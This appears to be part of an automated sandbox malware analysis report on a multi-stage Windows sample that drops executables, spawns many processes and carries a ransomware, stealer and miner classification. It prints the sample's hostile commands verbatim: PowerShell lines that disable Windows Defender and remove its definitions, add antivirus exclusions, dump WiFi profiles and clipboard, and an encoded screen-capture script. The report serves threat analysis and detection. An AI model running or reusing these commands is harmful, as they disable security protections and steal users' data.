                                  Source: libssl-1_1.dll.2.drStatic PE information: Section: UPX1 ZLIB complexity 0.9903694614553314
                                  Source: python310.dll.2.drStatic PE information: Section: UPX1 ZLIB complexity 0.99934387748315
                                  Source: sqlite3.dll.2.drStatic PE information: Section: UPX1 ZLIB complexity 0.9978469358079526
                                  Source: unicodedata.pyd.2.drStatic PE information: Section: UPX1 ZLIB complexity 0.9943230597527473
                                  Source: setup.exe, 00000012.00000002.1894081702.0000012916D50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: .SlnIX
                                  Source: classification engineClassification label: mal100.rans.spre.troj.spyw.expl.evad.mine.winEXE@147/153@3/4
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00D97BFF GetLastError,FormatMessageW,0_2_00D97BFF
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DAC652 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00DAC652
                                  Source: C:\ProgramData\setup.exeFile created: C:\Program Files\Google\Chrome\updater.exe
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\xnytOABw.log
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
                                  Source: C:\Recovery\HpQPPZazcv.exeMutant created: NULL
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1148:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7424:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6944:120:WilError_03
                                  Source: C:\ProgramData\Microsoft\based.exeMutant created: \Sessions\1\BaseNamedObjects\J
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5852:120:WilError_03
                                  Source: C:\Recovery\HpQPPZazcv.exeMutant created: \Sessions\1\BaseNamedObjects\Local\3e64fe795a96f6df9d1018608996331101f86f90de28dc67ad34401869b49857
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2180:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3272:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7044:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162Jump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCommand line argument: sfxname0_2_00DB037C
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCommand line argument: sfxstime0_2_00DB037C
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCommand line argument: STARTDLG0_2_00DB037C
                                  Source: 8Ck8T5qRcC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeFile read: C:\Windows\win.iniJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: based.exe, 00000004.00000002.2397463940.00007FFDFF191000.00000040.00000001.01000000.00000015.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                  Source: based.exe, based.exe, 00000004.00000002.2397463940.00007FFDFF191000.00000040.00000001.01000000.00000015.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                                  Source: based.exe, based.exe, 00000004.00000002.2397463940.00007FFDFF191000.00000040.00000001.01000000.00000015.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                  Source: based.exe, based.exe, 00000004.00000002.2397463940.00007FFDFF191000.00000040.00000001.01000000.00000015.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                  Source: based.exe, based.exe, 00000004.00000002.2397463940.00007FFDFF191000.00000040.00000001.01000000.00000015.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                  Source: based.exe, based.exe, 00000004.00000002.2397463940.00007FFDFF191000.00000040.00000001.01000000.00000015.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                                  Source: based.exe, based.exe, 00000004.00000002.2397463940.00007FFDFF191000.00000040.00000001.01000000.00000015.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                                  Source: 8Ck8T5qRcC.exeReversingLabs: Detection: 52%
                                  Source: 8Ck8T5qRcC.exeVirustotal: Detection: 37%
                                  Source: based.exeString found in binary or memory: id-cmc-addExtensions
                                  Source: based.exeString found in binary or memory: set-addPolicy
                                  Source: based.exeString found in binary or memory: can't send non-None value to a just-started generator
                                  Source: based.exeString found in binary or memory: --help
                                  Source: based.exeString found in binary or memory: --help
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeFile read: C:\Users\user\Desktop\8Ck8T5qRcC.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\8Ck8T5qRcC.exe "C:\Users\user\Desktop\8Ck8T5qRcC.exe"
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogym
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogym
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeProcess created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeProcess created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
                                  Source: C:\ProgramData\svchost.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline"
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6DA.tmp" "c:\Windows\System32\CSC43F2928123D49B6B141C06767811123.TMP"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAA